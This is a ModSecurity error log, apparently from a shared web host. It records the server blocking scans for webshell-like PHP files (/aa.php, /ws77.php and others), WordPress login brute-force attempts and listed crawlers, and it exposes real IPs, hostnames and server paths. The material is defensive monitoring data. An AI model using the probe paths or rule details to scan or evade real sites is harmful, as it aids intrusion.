[Tue May 26 19:40:57.593612 2026] [security2:error] [pid 70836:tid 71023] [client 20.151.117.104:30026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/aa.php"] [unique_id "ahWp8e_FvbQ_BhqVMRWMpAAAAL4"]
[Tue May 26 19:40:57.593754 2026] [security2:error] [pid 70836:tid 71023] [client 20.151.117.104:30026] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/aa.php"] [unique_id "ahWp8e_FvbQ_BhqVMRWMpAAAAL4"]
[Tue May 26 19:40:57.857529 2026] [security2:error] [pid 70836:tid 70949] [remote 74.7.241.58:39100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWp8e_FvbQ_BhqVMRWMtgAAznA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes
[Tue May 26 19:40:58.368267 2026] [security2:error] [pid 70836:tid 71036] [client 20.151.117.104:27790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/bolt.php"] [unique_id "ahWp8u_FvbQ_BhqVMRWMxQAAAMs"]
[Tue May 26 19:40:58.368366 2026] [security2:error] [pid 70836:tid 71036] [client 20.151.117.104:27790] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/bolt.php"] [unique_id "ahWp8u_FvbQ_BhqVMRWMxQAAAMs"]
[Tue May 26 19:40:58.427862 2026] [security2:error] [pid 70836:tid 71084] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp8e_FvbQ_BhqVMRWMvAAAAPs"]
[Tue May 26 19:40:59.736173 2026] [security2:error] [pid 70836:tid 71075] [client 20.151.117.104:30445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/x.php"] [unique_id "ahWp8-_FvbQ_BhqVMRWM9AAAAPI"]
[Tue May 26 19:40:59.736297 2026] [security2:error] [pid 70836:tid 71075] [client 20.151.117.104:30445] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/x.php"] [unique_id "ahWp8-_FvbQ_BhqVMRWM9AAAAPI"]
[Tue May 26 19:41:00.597708 2026] [security2:error] [pid 70836:tid 71002] [client 20.151.117.104:29306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/jga.php"] [unique_id "ahWp9O_FvbQ_BhqVMRWNCAAAAKk"]
[Tue May 26 19:41:00.597820 2026] [security2:error] [pid 70836:tid 71002] [client 20.151.117.104:29306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/jga.php"] [unique_id "ahWp9O_FvbQ_BhqVMRWNCAAAAKk"]
[Tue May 26 19:41:00.812038 2026] [security2:error] [pid 70836:tid 71047] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp9O_FvbQ_BhqVMRWNAQAAANY"]
[Tue May 26 19:41:01.270092 2026] [security2:error] [pid 70836:tid 70869] [remote 178.156.182.155:53364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWp9e_FvbQ_BhqVMRWNFwAA6yA"]
[Tue May 26 19:41:01.419603 2026] [security2:error] [pid 70836:tid 71086] [client 20.151.117.104:30079] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/k.php"] [unique_id "ahWp9e_FvbQ_BhqVMRWNIgAAAP0"]
[Tue May 26 19:41:01.419734 2026] [security2:error] [pid 70836:tid 71086] [client 20.151.117.104:30079] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/k.php"] [unique_id "ahWp9e_FvbQ_BhqVMRWNIgAAAP0"]
[Tue May 26 19:41:02.310044 2026] [security2:error] [pid 70836:tid 71037] [client 20.151.117.104:29314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/vx.php"] [unique_id "ahWp9u_FvbQ_BhqVMRWNQwAAAMw"]
[Tue May 26 19:41:02.310157 2026] [security2:error] [pid 70836:tid 71037] [client 20.151.117.104:29314] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/vx.php"] [unique_id "ahWp9u_FvbQ_BhqVMRWNQwAAAMw"]
[Tue May 26 19:41:02.408334 2026] [security2:error] [pid 70836:tid 71040] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp9e_FvbQ_BhqVMRWNMgAAAM8"]
[Tue May 26 19:41:03.462580 2026] [security2:error] [pid 70836:tid 71049] [client 20.151.117.104:30487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/ws77.php"] [unique_id "ahWp9-_FvbQ_BhqVMRWNXwAAANg"]
[Tue May 26 19:41:03.462701 2026] [security2:error] [pid 70836:tid 71049] [client 20.151.117.104:30487] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/ws77.php"] [unique_id "ahWp9-_FvbQ_BhqVMRWNXwAAANg"]
[Tue May 26 19:41:05.235130 2026] [security2:error] [pid 70836:tid 71044] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp-O_FvbQ_BhqVMRWNlQAAANM"]
[Tue May 26 19:41:05.435678 2026] [security2:error] [pid 70836:tid 70897] [remote 149.18.50.19:44896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.50.18.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWp-e_FvbQ_BhqVMRWNoQABATw"]
[Tue May 26 19:41:06.814230 2026] [security2:error] [pid 70836:tid 70883] [remote 149.18.50.19:44896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.50.18.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWp-u_FvbQ_BhqVMRWN0AAAoy4"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 19:41:07.726055 2026] [security2:error] [pid 70836:tid 71053] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp--_FvbQ_BhqVMRWN3AAAANw"]
[Tue May 26 19:41:09.637042 2026] [security2:error] [pid 70836:tid 70978] [client 216.244.66.241:43386] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/products/list"] [unique_id "ahWp_e_FvbQ_BhqVMRWOTAAAAJE"]
[Tue May 26 19:41:09.637162 2026] [security2:error] [pid 70836:tid 70978] [client 216.244.66.241:43386] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/products/list"] [unique_id "ahWp_e_FvbQ_BhqVMRWOTAAAAJE"]
[Tue May 26 19:41:09.854711 2026] [security2:error] [pid 70836:tid 70989] [client 45.131.193.22:36349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-login.php"] [unique_id "ahWp_e_FvbQ_BhqVMRWOUAAAAJw"]
[Tue May 26 19:41:10.094233 2026] [security2:error] [pid 70836:tid 71065] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp_e_FvbQ_BhqVMRWOTwAAAOg"]
[Tue May 26 19:41:10.890573 2026] [security2:error] [pid 70836:tid 70991] [client 95.27.40.229:22798] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahWp_u_FvbQ_BhqVMRWOdAAAAJ4"], referer: http://ameritradeng.com/contact.php
[Tue May 26 19:41:10.890612 2026] [security2:error] [pid 70836:tid 70991] [client 95.27.40.229:22798] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahWp_u_FvbQ_BhqVMRWOdAAAAJ4"], referer: http://ameritradeng.com/contact.php
[Tue May 26 19:41:12.445811 2026] [security2:error] [pid 70836:tid 70990] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqAO_FvbQ_BhqVMRWOmQAAAJ0"]
[Tue May 26 19:41:14.074474 2026] [security2:error] [pid 70836:tid 70862] [remote 46.20.146.46:51448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWqAe_FvbQ_BhqVMRWOzQAAsBk"]
[Tue May 26 19:41:14.711140 2026] [security2:error] [pid 70836:tid 70848] [remote 46.20.146.46:51448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWqAu_FvbQ_BhqVMRWO6wAAwQs"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:41:14.752300 2026] [security2:error] [pid 70836:tid 71023] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqAu_FvbQ_BhqVMRWO3wAAAL4"]
[Tue May 26 19:41:17.070742 2026] [security2:error] [pid 70836:tid 70993] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqBO_FvbQ_BhqVMRWPOAAAAKA"]
[Tue May 26 19:41:19.161044 2026] [security2:error] [pid 70836:tid 70991] [client 103.148.163.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqBu_FvbQ_BhqVMRWPfgAAAJ4"]
[Tue May 26 19:41:19.466619 2026] [security2:error] [pid 70836:tid 70976] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqB-_FvbQ_BhqVMRWPhAAAAI8"]
[Tue May 26 19:41:21.876967 2026] [security2:error] [pid 70836:tid 71050] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqCe_FvbQ_BhqVMRWP3wAAANk"]
[Tue May 26 19:41:22.007345 2026] [security2:error] [pid 70836:tid 71051] [client 158.62.221.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqCe_FvbQ_BhqVMRWP6wAAANo"], referer: http://anujtradingco.com/
[Tue May 26 19:41:23.364729 2026] [security2:error] [pid 70836:tid 71056] [client 103.216.221.76:16459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.221.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shirdisaibabatemple.org"] [uri "/xmlrpc.php"] [unique_id "ahWqC-_FvbQ_BhqVMRWQDQAAAN8"]
[Tue May 26 19:41:23.487720 2026] [security2:error] [pid 70836:tid 71056] [client 103.216.221.76:16459] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shirdisaibabatemple.org"] [uri "/xmlrpc.php"] [unique_id "ahWqC-_FvbQ_BhqVMRWQDQAAAN8"]
[Tue May 26 19:41:23.994756 2026] [security2:error] [pid 70836:tid 71031] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqC-_FvbQ_BhqVMRWQGQAAAMY"]
[Tue May 26 19:41:25.882941 2026] [security2:error] [pid 70836:tid 70952] [remote 18.209.220.99:36185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqDe_FvbQ_BhqVMRWQWgAAu3M"]
[Tue May 26 19:41:26.157196 2026] [security2:error] [pid 70836:tid 71018] [client 74.7.230.57:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.traderscafe.jiyani.in"] [uri "/robots.txt"] [unique_id "ahWqDu_FvbQ_BhqVMRWQcgAAALk"]
[Tue May 26 19:41:26.157899 2026] [security2:error] [pid 70836:tid 71028] [client 74.7.230.57:42782] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.traderscafe.jiyani.in"] [uri "/robots.txt"] [unique_id "ahWqDu_FvbQ_BhqVMRWQcAAAwx8"]
[Tue May 26 19:41:26.204606 2026] [security2:error] [pid 70836:tid 70996] [client 74.7.228.55:55286] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.traderscafe.club.jiyani.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWqDu_FvbQ_BhqVMRWQcwAAoyA"]
[Tue May 26 19:41:26.215727 2026] [security2:error] [pid 70836:tid 70980] [client 74.7.175.143:48442] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.traderscafe.in.jiyani.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWqDu_FvbQ_BhqVMRWQdAAAkwY"]
[Tue May 26 19:41:26.429515 2026] [security2:error] [pid 70836:tid 70993] [client 74.7.230.57:42790] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "traderscafe.jiyani.in"] [uri "/robots.txt"] [unique_id "ahWqDu_FvbQ_BhqVMRWQewAAoBM"], referer: https://www.traderscafe.jiyani.in/robots.txt
[Tue May 26 19:41:26.435372 2026] [security2:error] [pid 70836:tid 70850] [remote 18.209.220.99:36185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqDu_FvbQ_BhqVMRWQegAA6A0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:41:26.450767 2026] [security2:error] [pid 70836:tid 71009] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqDu_FvbQ_BhqVMRWQaAAAALA"]
[Tue May 26 19:41:26.658178 2026] [autoindex:error] [pid 70836:tid 70865] [remote 74.7.242.20:37018] AH01276: Cannot serve directory /home2/tips4iow/traderscafe.club/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:41:27.150178 2026] [security2:error] [pid 70836:tid 71042] [client 74.7.230.27:40278] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "traderscafe.jiyani.in"] [uri "/robots.txt"] [unique_id "ahWqD-_FvbQ_BhqVMRWQmgAA0Tg"]
[Tue May 26 19:41:27.179524 2026] [security2:error] [pid 70836:tid 70892] [remote 47.128.46.92:28996] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/nos-programmes/acces-universel-aux-telecommunications-portabilite/"] [unique_id "ahWqD-_FvbQ_BhqVMRWQnAAA1Dc"]
[Tue May 26 19:41:28.255836 2026] [security2:error] [pid 70836:tid 71055] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqD-_FvbQ_BhqVMRWQrgAAAN4"]
[Tue May 26 19:41:29.550724 2026] [security2:error] [pid 70836:tid 70881] [remote 20.36.138.181:42798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.138.36.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWqEe_FvbQ_BhqVMRWQ0gAAwiw"]
[Tue May 26 19:41:29.782436 2026] [security2:error] [pid 70836:tid 70971] [client 114.119.139.220:35535] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/global-cukurova-kargo"] [unique_id "ahWqEe_FvbQ_BhqVMRWQ5gAAAIo"], referer: https://www.cagmedya.com/referanslar/index/2
[Tue May 26 19:41:30.580308 2026] [security2:error] [pid 70836:tid 70993] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqEu_FvbQ_BhqVMRWQ7AAAAKA"]
[Tue May 26 19:41:30.729204 2026] [security2:error] [pid 70836:tid 71093] [client 188.130.142.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqEu_FvbQ_BhqVMRWRBAAAAQQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:41:32.657695 2026] [security2:error] [pid 70836:tid 71008] [client 188.130.142.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqFO_FvbQ_BhqVMRWRNQAAAK8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1223253&moderation-hash=b2fdebbf8933ce11cd1b3d919eb05c68
[Tue May 26 19:41:33.644946 2026] [security2:error] [pid 70836:tid 71018] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqFe_FvbQ_BhqVMRWRTgAAALk"]
[Tue May 26 19:41:35.898510 2026] [security2:error] [pid 70836:tid 71037] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqF-_FvbQ_BhqVMRWRnwAAAMw"]
[Tue May 26 19:41:37.250334 2026] [security2:error] [pid 70836:tid 71004] [client 185.247.137.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahWqGO_FvbQ_BhqVMRWRwwAAqyk"]
[Tue May 26 19:41:37.300659 2026] [security2:error] [pid 70836:tid 70980] [client 185.247.137.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWqGO_FvbQ_BhqVMRWRwgAAk2Y"]
